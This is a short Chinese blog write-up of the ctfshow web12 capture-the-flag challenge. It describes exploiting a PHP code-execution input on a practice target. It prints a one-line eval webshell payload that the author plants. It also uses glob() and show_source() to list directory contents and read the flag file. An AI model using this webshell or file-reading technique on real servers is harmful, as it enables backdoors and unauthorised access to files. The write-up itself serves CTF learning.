ctfshow--web12 glob和show_source命令执行

查看源代码有提示
image
以为是cmd命令解过输入linux命令愣是没反应后来输入phpinfo()才有回显
原来是被误导了。
一开始想的是直接写入一句话木马

点击查看代码
   @eval($_POST['attack']);echo 111;
//这里的echo 111是方便看我们有没有植入成功的
这里有111的回显证明木马注入成功了 ![image](https://img2024.cnblogs.com/blog/3376478/202404/3376478-20240404154147930-1849379872.png) 蚁剑连接试试 发现被deny了,应该是权限不够

image

这就有点苦恼了,一时间不知道要怎么搞

上网查了查
先学习一下php的几个命令:

点击查看代码

print_r(glob("*.txt"));查看当前目录下所有txt文件
show_source("1.php") //展示代码常用于读取文件内容

print_r(glob("."));//查看所有文件

image
show_source()查看这个名字很长的php文件
拿到flag
image

posted @ 2024-04-04 16:03  WSssSW  阅读(51)  评论(0编辑  收藏  举报